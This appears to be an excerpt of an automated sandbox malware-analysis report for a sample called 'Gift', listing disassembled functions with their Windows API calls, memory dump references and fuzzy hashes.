                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                          • String ID: Msctls_Progress32
                                                                          • API String ID: 1025951953-3636473452
                                                                          • Opcode ID: 15feb40c0a0fa9ea5c28ca31f28d2c1562c67fef25c73d3b33f3ff5565cef86a
                                                                          • Instruction ID: 9313deb8ac214e133401ccc48bcf3bb59b5b0fe9464f2b7f040f19dc396a4799
                                                                          • Opcode Fuzzy Hash: 15feb40c0a0fa9ea5c28ca31f28d2c1562c67fef25c73d3b33f3ff5565cef86a
                                                                          • Instruction Fuzzy Hash: 281182B2150219BEEF169F64CC85EE77F6DEF08798F014115FA08A60A0C772AC25DBA4
                                                                          Function 002F9D16 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __init_pointers.LIBCMT ref: 002F9D16
                                                                            • Part of subcall function 002F33B7: EncodePointer.KERNEL32(00000000), ref: 002F33BA
                                                                            • Part of subcall function 002F33B7: __initp_misc_winsig.LIBCMT ref: 002F33D5
                                                                            • Part of subcall function 002F33B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 002FA0D0
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 002FA0E4
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 002FA0F7
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 002FA10A
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 002FA11D
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 002FA130
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 002FA143
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 002FA156
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 002FA169
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 002FA17C
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 002FA18F
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 002FA1A2
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 002FA1B5
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 002FA1C8
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 002FA1DB
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 002FA1EE
                                                                          • __mtinitlocks.LIBCMT ref: 002F9D1B
                                                                          • __mtterm.LIBCMT ref: 002F9D24
                                                                            • Part of subcall function 002F9D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,002F9D29,002F7EFD,0038CD38,00000014), ref: 002F9E86
                                                                            • Part of subcall function 002F9D8C: _free.LIBCMT ref: 002F9E8D
                                                                            • Part of subcall function 002F9D8C: DeleteCriticalSection.KERNEL32(0R9,?,?,002F9D29,002F7EFD,0038CD38,00000014), ref: 002F9EAF
                                                                          • __calloc_crt.LIBCMT ref: 002F9D49
                                                                          • __initptd.LIBCMT ref: 002F9D6B
                                                                          • GetCurrentThreadId.KERNEL32 ref: 002F9D72
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                          • String ID:
                                                                          • API String ID: 3567560977-0
                                                                          • Opcode ID: b3e2f69db8a54836db512329561246b5b005ada74e6d0d078a3384a65c149fa2
                                                                          • Instruction ID: 35609167ae7337e0b9f8fbd59a422636f193a49f460cf73e647a5646a6dfdf3a
                                                                          • Opcode Fuzzy Hash: b3e2f69db8a54836db512329561246b5b005ada74e6d0d078a3384a65c149fa2
                                                                          • Instruction Fuzzy Hash: ABF0623253571A59E6357B747C0377AE694DB42BF0F20473AF654D50D2EF1184A14990
                                                                          Function 002F41B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,002F4282,?), ref: 002F41D3
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 002F41DA
                                                                          • EncodePointer.KERNEL32(00000000), ref: 002F41E6
                                                                          • DecodePointer.KERNEL32(00000001,002F4282,?), ref: 002F4203
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                          • String ID: RoInitialize$combase.dll
                                                                          • API String ID: 3489934621-340411864
                                                                          • Opcode ID: adad0e076c05fb1e961c044ed69e7f987fd99b35fccc774fddb0648acbbac314
                                                                          • Instruction ID: f50ddde8523214f74d39e593a3c279be32113da31294c90224f990b4d808287d
                                                                          • Opcode Fuzzy Hash: adad0e076c05fb1e961c044ed69e7f987fd99b35fccc774fddb0648acbbac314
                                                                          • Instruction Fuzzy Hash: 0BE01A756A0701AFEF572F70ED4EB5A366CAB11B46F608425F501D51A0CBF640848F00
                                                                          Function 002F428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,002F41A8), ref: 002F42A8
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 002F42AF
                                                                          • EncodePointer.KERNEL32(00000000), ref: 002F42BA
                                                                          • DecodePointer.KERNEL32(002F41A8), ref: 002F42D5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                          • String ID: RoUninitialize$combase.dll
                                                                          • API String ID: 3489934621-2819208100
                                                                          • Opcode ID: 688d3a32c277c04a75f9723321d5d4d26c61a02e6b3ac3fa893cf46018b65633
                                                                          • Instruction ID: d715f3d7e99e3c5613c6807dfe5c270e57480b9452a6a054f78898444129b25d
                                                                          • Opcode Fuzzy Hash: 688d3a32c277c04a75f9723321d5d4d26c61a02e6b3ac3fa893cf46018b65633
                                                                          • Instruction Fuzzy Hash: 45E0B6745A0701ABDF579F60AD0EB563A7CBB00B42F608526F501E51B4CBF64698CB14
                                                                          Function 002D218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetClientRect.USER32(?,?), ref: 002D21B8
                                                                          • GetWindowRect.USER32(?,?), ref: 002D21F9
                                                                          • ScreenToClient.USER32(?,?), ref: 002D2221
                                                                          • GetClientRect.USER32(?,?), ref: 002D2350
                                                                          • GetWindowRect.USER32(?,?), ref: 002D2369
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Rect$Client$Window$Screen
                                                                          • String ID:
                                                                          • API String ID: 1296646539-0
                                                                          • Opcode ID: 931c975de3545d0622d758e033158fe9d26fd38da1f94a168d765baae670afc5
                                                                          • Instruction ID: 4aa3e1314a494c75c8d978214a89bdbadb6690628d4b971da1e43cba57c9a81a
                                                                          • Opcode Fuzzy Hash: 931c975de3545d0622d758e033158fe9d26fd38da1f94a168d765baae670afc5
                                                                          • Instruction Fuzzy Hash: 5EB1793991024ADBDB10CFA8C5847EEB7B1FF18310F14816AED59AB350DB74AE64CB64
                                                                          Function 00336A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$__itow__swprintf
                                                                          • String ID:
                                                                          • API String ID: 3253778849-0
                                                                          • Opcode ID: a3960745c7e0411a19d53e671930073a89f54e9de2642b05b2d2c3cf3d093c00
                                                                          • Instruction ID: 59e2d62b5733174418aa7e126c70b811b4f49989520e448a7b82400268c43837
                                                                          • Opcode Fuzzy Hash: a3960745c7e0411a19d53e671930073a89f54e9de2642b05b2d2c3cf3d093c00
                                                                          • Instruction Fuzzy Hash: 7661CE3111029AAFCF12EF60CC86EFE77A9AF05348F448569F9959B292DB349C25CF50
                                                                          Function 00350844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                            • Part of subcall function 0035147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0035040D,?,?), ref: 00351491
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0035091D
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0035095D
                                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00350980
                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003509A9
                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003509EC
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 003509F9
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                          • String ID:
                                                                          • API String ID: 4046560759-0
                                                                          • Opcode ID: 8a95e75db25452269a53be3746d2a1bc2f9a5ca0ebf7c2ac9b56cb63e4cdf1d4
                                                                          • Instruction ID: 016df6cdeee1ee8a5d770177914bfe1459cc279e359015140b47d2768e022ded
                                                                          • Opcode Fuzzy Hash: 8a95e75db25452269a53be3746d2a1bc2f9a5ca0ebf7c2ac9b56cb63e4cdf1d4
                                                                          • Instruction Fuzzy Hash: 0E518C31118240AFD716EF64C885E6FBBE9FF84314F04492DF995872A2DB31E919CB52
                                                                          Function 0032F688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 0032F6A2
                                                                          • VariantClear.OLEAUT32(00000013), ref: 0032F714
                                                                          • VariantClear.OLEAUT32(00000000), ref: 0032F76F
                                                                          • _memmove.LIBCMT ref: 0032F799
                                                                          • VariantClear.OLEAUT32(?), ref: 0032F7E6
                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0032F814
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                                                          • String ID:
                                                                          • API String ID: 1101466143-0
                                                                          • Opcode ID: 9a6ec41e106fce4932269326abc0862d6ec8fe08eaed38bf3d1e569f8c9801c2
                                                                          • Instruction ID: 5cdb402d5b2c4ecb9c26be0dbff36918a5ede2482ff1486f663683a8b8030b35
                                                                          • Opcode Fuzzy Hash: 9a6ec41e106fce4932269326abc0862d6ec8fe08eaed38bf3d1e569f8c9801c2
                                                                          • Instruction Fuzzy Hash: 735148B5A00219EFDB15CF58D884AAAB7B8FF4C354B15856AED59DB300D730E911CFA0
                                                                          Function 003329B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 003329FF
                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00332A4A
                                                                          • IsMenu.USER32(00000000), ref: 00332A6A
                                                                          • CreatePopupMenu.USER32 ref: 00332A9E
                                                                          • GetMenuItemCount.USER32(000000FF), ref: 00332AFC
                                                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00332B2D
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                          • String ID:
                                                                          • API String ID: 3311875123-0
                                                                          • Opcode ID: 5f48a54d53f5d05836170a1706c56dd0c81ea2a988f800e11f9c07cc0238d7df
                                                                          • Instruction ID: 14c80d480cf0e31b6e1f49a57d8d29ef71e9227bf5abc7fc8ea18b83b2f42cbe
                                                                          • Opcode Fuzzy Hash: 5f48a54d53f5d05836170a1706c56dd0c81ea2a988f800e11f9c07cc0238d7df
                                                                          • Instruction Fuzzy Hash: F5519C70A00349DBDF26CF68D8C9AAFFBF8AF45314F114159E8119B2A1DBB09944CB51
                                                                          Function 002D1B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002D29E2: GetWindowLongW.USER32(?,000000EB), ref: 002D29F3
                                                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 002D1B76
                                                                          • GetWindowRect.USER32(?,?), ref: 002D1BDA
                                                                          • ScreenToClient.USER32(?,?), ref: 002D1BF7
                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 002D1C08
                                                                          • EndPaint.USER32(?,?), ref: 002D1C52
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                          • String ID:
                                                                          • API String ID: 1827037458-0
                                                                          • Opcode ID: be87bd2555b800b28c3cb4405611e90350ba6c286cb299b8da0297c6dac335a8
                                                                          • Instruction ID: daf13390cc5321869308e4270dacc041155c58fb1f81ecf8e4475bb35827eab9
                                                                          • Opcode Fuzzy Hash: be87bd2555b800b28c3cb4405611e90350ba6c286cb299b8da0297c6dac335a8
                                                                          • Instruction Fuzzy Hash: 9541DE30128300AFD712DF24CC89FBA7BE8EB46324F14066AF995872E1C7719C65DB62
                                                                          Function 0035BD10 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ShowWindow.USER32(003977B0,00000000,013752A0,?,?,003977B0,?,0035BC1A,?,?), ref: 0035BD84
                                                                          • EnableWindow.USER32(00000000,00000000), ref: 0035BDA8
                                                                          • ShowWindow.USER32(003977B0,00000000,013752A0,?,?,003977B0,?,0035BC1A,?,?), ref: 0035BE08
                                                                          • ShowWindow.USER32(00000000,00000004,?,0035BC1A,?,?), ref: 0035BE1A
                                                                          • EnableWindow.USER32(00000000,00000001), ref: 0035BE3E
                                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0035BE61
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                          • String ID:
                                                                          • API String ID: 642888154-0
                                                                          • Opcode ID: fec93c84daa3e3357c1de5515fa014ca17f8e73b7283284405d60238493a7e09
                                                                          • Instruction ID: 3b570988c3028311b73c724483ab310aa9f9fbd8ea735b79e1bd6d0ce16a0a4a
                                                                          • Opcode Fuzzy Hash: fec93c84daa3e3357c1de5515fa014ca17f8e73b7283284405d60238493a7e09
                                                                          • Instruction Fuzzy Hash: 13411734600144AFDB27CF28D48AF95BBF1BB05316F1981A9EE588F2B2C771A859CB51
                                                                          Function 00347788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,0034550C,?,?,00000000,00000001), ref: 00347796
                                                                            • Part of subcall function 0034406C: GetWindowRect.USER32(?,?), ref: 0034407F
                                                                          • GetDesktopWindow.USER32 ref: 003477C0
                                                                          • GetWindowRect.USER32(00000000), ref: 003477C7
                                                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 003477F9
                                                                            • Part of subcall function 003357FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00335877
                                                                          • GetCursorPos.USER32(?), ref: 00347825
                                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00347883
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                          • String ID:
                                                                          • API String ID: 4137160315-0
                                                                          • Opcode ID: 2546d23ae16ef7278c2b4bcffd5fc1e23eae8f5cf698b5dd4105b9307fbd8003
                                                                          • Instruction ID: 4e547574822f786ee63c34bb64d4ac787f9e0129a19e3a25ff8b0bbf32d61de1
                                                                          • Opcode Fuzzy Hash: 2546d23ae16ef7278c2b4bcffd5fc1e23eae8f5cf698b5dd4105b9307fbd8003
                                                                          • Instruction Fuzzy Hash: BF31B072508305ABD725DF14C84AF9BB7E9FF88314F004919F599AB191CB70F909CBA2
                                                                          Function 00329431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00328CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00328CDE
                                                                            • Part of subcall function 00328CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00328CE8
                                                                            • Part of subcall function 00328CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00328CF7
                                                                            • Part of subcall function 00328CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00328CFE
                                                                            • Part of subcall function 00328CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00328D14
                                                                          • GetLengthSid.ADVAPI32(?,00000000,0032904D), ref: 00329482
                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0032948E
                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00329495
                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 003294AE
                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,0032904D), ref: 003294C2
                                                                          • HeapFree.KERNEL32(00000000), ref: 003294C9
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                          • String ID:
                                                                          • API String ID: 3008561057-0
                                                                          • Opcode ID: 82162ea461f507e589b44802d53c12a540d2ca5f9e4d2896f595e48a1153ec6e
                                                                          • Instruction ID: 276e2798ad2ba56bb9689af0f193c495b71a91c8dcdae553e83aefebe195b043
                                                                          • Opcode Fuzzy Hash: 82162ea461f507e589b44802d53c12a540d2ca5f9e4d2896f595e48a1153ec6e
                                                                          • Instruction Fuzzy Hash: 0C11EE32901214FFDB16EFA5EC1ABAF7BADFB42316F10801AE84197210C7369901CB60
                                                                          Function 003291CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00329200
                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00329207
                                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00329216
                                                                          • CloseHandle.KERNEL32(00000004), ref: 00329221
                                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00329250
                                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00329264
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
